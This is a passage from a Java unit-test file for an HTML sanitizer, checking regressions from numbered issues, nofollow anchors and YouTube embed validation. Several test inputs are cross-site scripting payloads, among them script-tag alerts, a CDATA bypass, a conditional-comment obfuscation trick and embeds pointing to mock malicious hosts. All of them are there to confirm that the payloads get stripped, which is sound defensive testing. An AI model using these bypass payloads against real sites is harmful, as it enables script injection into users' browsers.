String testStr = new String( | |
Base64.decodeBase64(BASE64_BAD_XML_STRINGS[i]), | |
"UTF-8"); | |
sanitize(testStr); | |
sanitize(testStr); | |
} | |
// These fail in AntiSamy due to a bug in NekoHTML | |
assertEquals( | |
"<a href=\"http://www.test.com\" rel=\"nofollow\"></a>", | |
sanitize("<a . href=\"http://www.test.com\">")); | |
assertEquals( | |
"<a href=\"http://www.test.com\" rel=\"nofollow\"></a>", | |
sanitize("<a - href=\"http://www.test.com\">")); | |
assertTrue(sanitize("<style>") != null); | |
} | |
public void testPreviousBugs() throws Exception { | |
/* | |
* issues 12 (and 36, which was similar). empty tags cause display | |
* problems/"formjacking" | |
*/ | |
{ | |
Pattern p = Pattern.compile(".*<strong(\\s*)/>.*", Pattern.DOTALL); | |
String s1 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>"); | |
String s2 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>"); | |
assertFalse(p.matcher(s1).matches()); | |
p = Pattern.compile(".*<b(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
p = Pattern.compile(".*<i(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
p = Pattern.compile(".*<hr(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
} | |
/* issue #20 */ | |
assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />"); | |
assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />"); | |
/* issue #25 */ | |
assertEquals( | |
"<div>Test</div>", sanitize("<div style=\"margin: -5em\">Test</div>")); | |
/* issue #28 */ | |
assertSanitizedDoesContain( | |
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">Test</div>", | |
"font-family:'geneva' , 'arial' , 'courier new' , sans-serif"); | |
/* issue #29 - missing quotes around properties with spaces */ | |
if (RUN_KNOWN_FAILURES) { | |
String s = "<style type=\"text/css\"><![CDATA[P {\n font-family: \"Arial Unicode MS\";\n}\n]]></style>"; | |
assertEquals(s, sanitize(s)); | |
} | |
/* issue #30 */ | |
if (RUN_KNOWN_FAILURES) { | |
String s = "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>"; | |
s = sanitize(s); | |
// followup - does the patch fix multiline CSS? | |
String s2 = "<style type=\"text/css\"><![CDATA[\r\nP {\r\n margin-bottom: 0.08in;\r\n}\r\n]]></style>"; | |
assertEquals("<style type=\"text/css\"><![CDATA[P {\n\tmargin-bottom: 0.08in;\n}\n]]></style>", sanitize(s2)); | |
// next followup - does non-CDATA parsing still work? | |
String s3 = "<style>P {\n\tmargin-bottom: 0.08in;\n}\n"; | |
assertEquals("<style>P {\n\tmargin-bottom: 0.08in;\n}\n</style>\n", sanitize(s3)); | |
// for other | |
// tests | |
} | |
/* issue #32 - nekos problem */ | |
{ | |
String s = "<SCRIPT =\">\" SRC=\"\"></SCRIPT>"; | |
sanitize(s); | |
sanitize(s); | |
} | |
/* issue #37 - OOM */ | |
{ | |
String dirty = "<a onblur=\"try {parent.deselectBloggerImageGracefully();}" + "catch(e) {}\"" | |
+ "href=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"><img" + "style=\"FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 150px; CURSOR:" | |
+ "hand; HEIGHT: 100px\" alt=\"\"" + "src=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"" | |
+ "border=\"0\" /></a><br />Poor Bill, couldn't make it to the Museum's <span" + "class=\"blsp-spelling-corrected\" id=\"SPELLING_ERROR_0\">story time</span>" | |
+ "today, he was so busy shoveling! Well, we sure missed you Bill! So since" + "ou were busy moving snow we read books about snow. We found a clue in one" | |
+ "book which revealed a snowplow at the end of the story - we wish it had" + "driven to your driveway Bill. We also read a story which shared fourteen" | |
+ "<em>Names For Snow. </em>We'll catch up with you next week....wonder which" + "hat Bill will wear?<br />Jane"; | |
String s = sanitize(dirty); | |
assertNotNull(s); | |
} | |
/* issue #38 - color problem/color combinations */ | |
{ | |
String s = "<font color=\"#fff\">Test</font>"; | |
String expected = "<font color=\"#fff\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<div style=\"color: #fff\">Test 3 letter code</div>"; | |
expected = "<div style=\"color:#fff\">Test 3 letter code</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<font color=\"red\">Test</font>"; | |
expected = "<font color=\"red\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<font color=\"neonpink\">Test</font>"; | |
expected = s; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
if (RUN_KNOWN_FAILURES) { | |
s = "<font color=\"#0000\">Test</font>"; | |
expected = "<font>Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
s = "<div style=\"color: #0000\">Test</div>"; | |
expected = "<div>Test</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
} | |
s = "<font color=\"#000000\">Test</font>"; | |
expected = "<font color=\"#000000\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<div style=\"color: #000000\">Test</div>"; | |
expected = "<div style=\"color:#000000\">Test</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<b><u>foo<style><script>alert(1)</script></style>@import 'x';</u>bar"; | |
sanitize(s); | |
} | |
/* issue #40 - handling <style> media attributes right */ | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain("<style media=\"print, projection, screen\"> P { margin: 1em; }</style>", "print, projection, screen"); | |
} | |
/* issue #41 - comment handling */ | |
{ | |
assertEquals("text ", sanitize("text <!-- comment -->")); | |
assertEquals("text ", sanitize("text <!-- comment -->")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>")); | |
/* | |
* Check to see how nested conditional comments are handled. This is | |
* not very clean but the main goal is to avoid any tags. Not sure | |
* on encodings allowed in comments. | |
*/ | |
String input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>"; | |
String expected = "<div>text <[endif]--></div>"; | |
String output = sanitize(input); | |
assertEquals(expected, output); | |
input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>"; | |
expected = "<div>text <[endif]--></div>"; | |
output = sanitize(input); | |
assertEquals(expected, output); | |
/* | |
* Regular comment nested inside conditional comment. Test makes | |
* sure | |
*/ | |
assertEquals("<div>text comment <[endif]--></div>", sanitize("<div>text <!--[if IE]> <!-- IE specific --> comment <[endif]--></div>")); | |
/* | |
* These play with whitespace and have invalid comment syntax. | |
*/ | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- [ if lte 6 ]>\ncomment <[ endif\n]--></div>")); | |
assertEquals("<div>text comment </div>", sanitize("<div>text <![if !IE]> comment <![endif]></div>")); | |
assertEquals("<div>text comment </div>", sanitize("<div>text <![ if !IE]> comment <![endif]></div>")); | |
String attack = "[if lte 8]<script>"; | |
String spacer = "<![if IE]>"; | |
StringBuffer sb = new StringBuffer(); | |
sb.append("<div>text<!"); | |
for (int i = 0; i < attack.length(); i++) { | |
sb.append(attack.charAt(i)); | |
sb.append(spacer); | |
} | |
sb.append("<![endif]>"); | |
String s = sb.toString(); | |
assertSanitizedDoesNotContain(s, "<script"); | |
assertSanitizedDoesNotContain(s, "<script"); | |
} | |
/* | |
* issue #44 - childless nodes of non-allowed elements won't cause an error | |
*/ | |
{ | |
String s = "<iframe src='http://foo.com/'></iframe>" + "<script src=''></script>" + "<link href='/foo.css'>"; | |
assertEquals(s, "", sanitize(s)); | |
} | |
/* issue #51 - offsite urls with () are found to be invalid */ | |
assertSanitizedDoesNotContain( | |
"<a href='http://subdomain.domain/(S(ke0lpq54bw0fvp53a10e1a45))/MyPage.aspx'>test</a>", "("); | |
/* issue #56 - unnecessary spaces */ | |
{ | |
String s = "<SPAN style='font-weight: bold;'>Hello World!</SPAN>"; | |
assertEquals( | |
"<span style=\"font-weight:bold\">Hello World!</span>", | |
sanitize(s)); | |
} | |
/* issue #58 - input not in list of allowed-to-be-empty tags */ | |
{ | |
String s = "tgdan <input/> g h"; | |
assertEquals("tgdan g h", sanitize(s)); | |
} | |
/* issue #61 - input has newline appended if ends with an accepted tag */ | |
{ | |
String dirtyInput = "blah <b>blah</b>."; | |
String s = sanitize(dirtyInput); | |
assertEquals(dirtyInput, s); | |
} | |
/* issue #69 - char attribute should allow single char or entity ref */ | |
{ | |
String s = "<td char='.'>test</td>"; | |
assertSanitizedDoesContain(s, "char"); | |
assertSanitizedDoesContain(s, "char"); | |
s = "<td char='..'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
s = "<td char='"'>test</td>"; | |
assertSanitizedDoesContain(s, "char"); | |
assertSanitizedDoesContain(s, "char"); | |
s = "<td char='"a'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
s = "<td char='"&'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
} | |
/* privately disclosed issue - cdata bypass */ | |
{ | |
String malInput = "<![CDATA[]><script>alert(1)</script>]]>"; | |
assertSanitizedDoesNotContain(malInput, "<script"); | |
} | |
/* this test is for confirming literal-lists work as | |
* advertised. it turned out to be an invalid / non- | |
* reproducible bug report but the test seemed useful | |
* enough to keep. | |
*/ | |
{ | |
String malInput = "hello<p align='invalid'>world</p>"; | |
assertSanitizedDoesNotContain(malInput, "invalid"); | |
String goodInput = "hello<p align='left'>world</p>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(goodInput, "left"); | |
} | |
} | |
} | |
/* | |
* Tests cases dealing with nofollowAnchors directive. Assumes anchor tags | |
* have an action set to "validate" (may be implicit) in the policy file. | |
*/ | |
public void testNofollowAnchors() throws Exception { | |
// adds when not present | |
assertSanitized("<a href=\"blah\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// adds properly even with bad attr | |
assertSanitized("<a href=\"blah\" bad=\"true\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// rel with bad value gets corrected | |
assertSanitized("<a href=\"blah\" rel=\"blh\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// correct attribute doesnt get messed with | |
assertSanitized("<a href=\"blah\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// if two correct attributes, only one remaining after scan | |
assertSanitized("<a href=\"blah\" rel=\"nofollow\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// test if value is off - does it add? | |
assertSanitizedDoesNotContain("a href=\"blah\">link</a>", "nofollow"); | |
} | |
public void testValidateParamAsEmbed() throws Exception { | |
// let's start with a YouTube embed | |
String input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
String expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
String saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, saxExpectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
// now what if someone sticks malicious URL in the value of the | |
// value attribute in the param tag? remove that param tag | |
input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://supermaliciouscode.com/badstuff.swf\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>"; | |
saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
assertTrue(sanitize(input).equals(saxExpectedOutput)); | |
} else { | |
assertSanitized(input, ""); | |
} | |
// now what if someone sticks malicious URL in the value of the src | |
// attribute in the embed tag? remove that embed tag | |
input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://hereswhereikeepbadcode.com/ohnoscary.swf\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /></object>"; | |
saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, saxExpectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
} | |
private static void assertSanitizedDoesNotContain( | |
String html, String dangerousContent) { | |
String sanitized = sanitize(html); | |
int index = Strings.toLowerCase(sanitized).indexOf( | |
Strings.toLowerCase(dangerousContent)); | |
assertEquals( | |
"`" + sanitized + "` from `" + html + "` contains `" + | |
dangerousContent + "`", | |
-1, index); | |
} | |
private static void assertSanitizedDoesContain( | |
String html, String dangerousContent) { | |
String sanitized = sanitize(html); | |
int index = Strings.toLowerCase(sanitized).indexOf( | |
Strings.toLowerCase(dangerousContent)); | |
assertTrue( | |
"`" + sanitized + "` from `" + html + "` does not contain `" + | |
dangerousContent + "`", | |
index >= 0); | |
} | |
private static void assertSanitized(String html, String sanitized) { | |
assertEquals(sanitized, sanitize(html)); | |
} | |
private static String guessCharsetFromContentType(String contentType) { | |
Matcher m = Pattern.compile(";\\s*charset=(?:\"([^\"]*)\"|([^\\s;]*))") | |
.matcher(contentType); | |
if (m.find()) { | |
String ct; | |
ct = m.group(1); | |
if (ct != null) { return ct; } | |
ct = m.group(2); | |
if (ct != null) { return ct; } | |
} | |
return "UTF-8"; | |
} | |
} |